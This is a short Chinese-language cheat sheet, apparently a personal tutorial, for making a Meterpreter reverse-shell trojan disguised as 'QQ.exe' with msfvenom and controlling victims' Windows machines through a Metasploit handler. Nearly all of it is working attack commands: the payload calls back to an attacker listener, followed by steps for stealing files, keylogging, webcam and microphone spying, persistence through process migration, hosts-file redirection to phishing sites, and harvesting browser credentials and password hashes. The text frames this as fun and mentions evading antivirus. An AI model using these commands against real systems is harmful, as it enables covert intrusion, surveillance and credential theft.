大家玩玩就好,有杀毒软件可能会被干掉,关于免杀方式有很多,请勿捉弄同学,谢谢
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.128.149 LPORT=8888 -f exe -o QQ.exe ---制作木马
msfconsole --进入控制台
msf > use exploit/multi/handler --调用模块 -->目的在于设置与木马程序的通信方式和监听端口
msf exploit(multi/handler) > set payloay windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.0.128.149
msf exploit(multi/handler) > set lpost 8888
msf exploit(multi/handler) > exploit -z -j
msf exploit(multi/handler) > jobs ---查看是否成功运行并监听对应端口
诱导宿主机运行桌面exe文件后,被监听。
msf exploit(multi/handler) > sessions -----查看所控制的宿主机
msf exploit(multi/handler) > sessions -i 1 ---进入对应编号宿主机
meterpreter >
meterpreter > ls ---查看肉鸡桌面文件
下载文件到本地: download b.txt
创建文件:echo 你被我控制了哈哈 > a.txt
upload a.txt C:\Users\Administrator\Desktop
sysinfo --查看系统相关信息
meterpreter > execute -f notepad.exe ---运行记事本
execute -H -i -f cmd.exe ---交互运行cmd ---- 等同于 shell ,进入后可以执行关闭防火墙或
设置防火墙策略来隐蔽行为。
edit ----> 运行vi命令 可以用于设置宿主机的hosts文件,进入钓鱼网站。(C:\Windows\System32\drivers\etc\hosts)
keyscan_start ---开始捕捉键盘操作 keyscan_dump --显示捕捉结果 keyscan_stop --停止捕捉键盘
reboot -重启
screenshot --捕捉屏幕 并保存至本地
record_mic -d ---录制音频文件并保存
webcam_list ---查看你的宿主机摄像头接口
webcam_chat ----跟你的宿主机主人面对面
webcam_stream ----使用宿主机的摄像头录像
甚至可以加载嗅探模块,监控主机网络通信 use sniffer --->抓到数据包进行解析
ps ---查看宿主机进程 |
getpid --查找控制进程的PID |将控制进程与其他进程进行绑定,实现持久化 ,
|与winlogin.exe 绑定可以通过捕获键盘记录,得到宿主机的相关账号和密码
migrate + 其他进程PID进行绑定 |
run post/windows/gather/enum_ie ----加载后渗透模块,可以读取浏览器缓存,嗅探各种账号密码
run post/windows/gather/smart_hashdump ---提取系统用户名和密码,结合添加ssh代理,而保证登录稳定。